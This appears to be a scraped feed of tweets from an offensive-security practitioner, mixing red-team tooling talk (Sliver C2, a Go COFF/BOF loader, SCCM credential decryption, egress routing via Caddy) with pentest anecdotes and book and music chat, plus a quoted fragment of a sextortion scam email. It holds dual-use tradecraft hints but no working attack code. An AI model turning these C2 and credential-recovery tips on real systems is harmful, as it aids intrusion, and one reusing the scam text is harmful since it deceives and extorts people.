C Sto

@Grady_Booch Not Olympics, SEA games

@xyantix Hey. I am a programmer who hacked your device's operating system. I have been observing you for a few months already. The point is that you have been infected with my virus through the adult website that you visited. If you are not familiar with this, I will explain. Trojan vi

STOP👏SUBMITTING👏CREDS👏FROM👏STEALER 👏LOGS👏TO👏BOUNTY👏PROGRAMS

@riskybusiness Can you not

@TracketPacer Not whole network, but also managed to uninstall iptables on a colo host (different country) after resetting all the rules, so no egress or ingress allowed at all

tell me your funniest “i took the network down” stories? i need a laugh today

@TracketPacer Was poking at a login page on a pentest, thought it was weird that special characters in the username made the response longer sometimes. Thought I could enum user accounts with it. Turns out it was ldap injection, so I was locking out all accounts starting with A… B…

@mcohmi Make sure you check out master for extension stuff - recent changes use bof arg parsing which opens up the ability to send files as arguments etc

Trying to write Sliver extensions in Vlang and got stuck on a problem for two days. Went to the bar, came back, and got it in 5 minutes. 🙃🙃🙃

@GrahamHelton3 Snaffler will run on a Linux if you use the right build incantations, or github.com/C-Sto/gobbler for extremely cross platform support

Obscure question but does anyone know of a better way to search for files on a large linux system? I'm looking for something like `(rip)grep -ri "word_to_search_for"` but takes input from a wordlist and has some sort of logging of output.

@ss2342 Don’t think it’s dpapi, but not sure where the key is stored in the backups - maybe it’s not? github.com/subat0mik/Misc…

Given a SCCM/SMS/ConfigMgr backup (including the SiteDBServer, SiteServer, etc), what is the best way to decrypt the credentials stored in the database? Google seems to suggest these are encrypted with DPAPI, but that seems like then you wouldn't be able to restore from backup?

@seventhsec @vortexau +1 on the alchemist, though it’s pretty short, it’s one of the few books I will think ‘I should read that again’ every few years

If you needed to select a fiction book to read for a few hours a day, what would you pick? Please don't suggest 1984 or similar (read them). Nor fantasy. Sci-fi is OK. Open to short stories, poetry and similar. Anything positive and uplifting. No idea where to start.

@nnwakelam if its the groove you like, there is a bunch of female vox gogo inspired tracks around - obvious ones that come to mind: jlo-get right amerie-1 thing beyonce-greenlight pretty much every backyard band cover of R&B/pop tunes otherwise 00's pop all sounded pretty similar lol

song recommendations that have this kind of energy - looking for suggestions open.spotify.com/track/3U5JVgI2… Toxic - Britney Spears I wish I was a Punk Rocker - Sandi Thom

@Ne0nd0g I wonder if there is anywhere in the runtime that exposes go functions as callbacks to OS routines - might be a good place to figure out the least painful way of doing it.

@C__Sto I did consider reaching out to you specifically to look at using ASM. Not off the table, but want to get things fully functional with cgo before going that route.

Finally got a proof of concept COFF & BOF loader working all in Go. There’s still a lot of work to be done though like take arguments, handle more relocation types, and implement the rest of the Beacon functions. Currently works for TrustedSec’s whoami BOF.

@Ne0nd0g I think you may be able to set up functions with a different ABI if you use asm, though I’m not sure I’d wish that on anyone even if it worked

I ended up having to use cgo to export Go functions so I can call them from the COFF. I’m not too happy with that. Another option is to load a compatibility DLL that exposes the needed Beacon functions.

@techspence Fun answer: RE exe, figure out crypto ctf Fast answer: put exe and password file in a sandbox and listen on the relevant db ports for incoming connections

Say you're on an endpoint that has an executable on it. The exe, when run, grabs an encrypted password from a config file on a file share and then uses it to connect to a database. The traffic is encrypted. Thoughts on obtaining the plaintext password?

@ImposeCost This tweet has the same energy as ‘knives also get used to murder, why not ban those’

@ss2342 This could be a stock image for working on PCB’s

Cutting up my Wii so there's less super smash bros melee in the world

@lpha3ch0 Disagree. Cater it to the audience, but usually you are prioritising coverage during the engagement. If there is a question about what can be done with xss, there is plenty of reading material already around. If they want a poc, it should be considered extra.

Note to junior pentesters: when you report XSS, showing a popup is only the first step, not the final poc. If you’re not putting in the effort to show the impact with a poc that harvests credentials, executes CSRF, etc, you’re failing your customer and making yourself look bad. Try harder. The only time I stop at a popup is if the testing window is ending and I have no other choice. TBH, I’ve made this mistake but I learned from it.

@mcohmi @jrozner Caddy is great, but it’s bitten me a few times with not supporting old TLS stacks - HAProxy has been consistently good once you unlock the config logic in your brain

@jrozner If you only have a single port for egress, then put something like Caddy in front of your Sliver instance and route specific URLs to download the file while everything else gets routed to Sliver. I haven't taken OSEP but these would have been my next steps if it was me.

That’s a wrap. Did not pass the OSEP exam. Got 80 out of the 100 necessary points. I had lots of trouble with tooling. Some my own and some using tools that do things in a way that’s a little different from metasploit which made it harder. A few observations 1/n

@ImposeCost I thought it was a pretty lame way to advertise your ‘swag’, but I’m not the target market so was gonna give it a pass. I was very disappointed to discover you use guessy challenges for technical interviews. I don’t disagree with you on the value, I disagree with the execution.

@ImposeCost Not very common without a decoder though is it.

@ImposeCost BaseN ‘matryoshka doll’ is bad chaldev, sorry. Doubly so in an interview. If the point is to see someone triage the file, just give the file and ask if they have heard of base32 or something.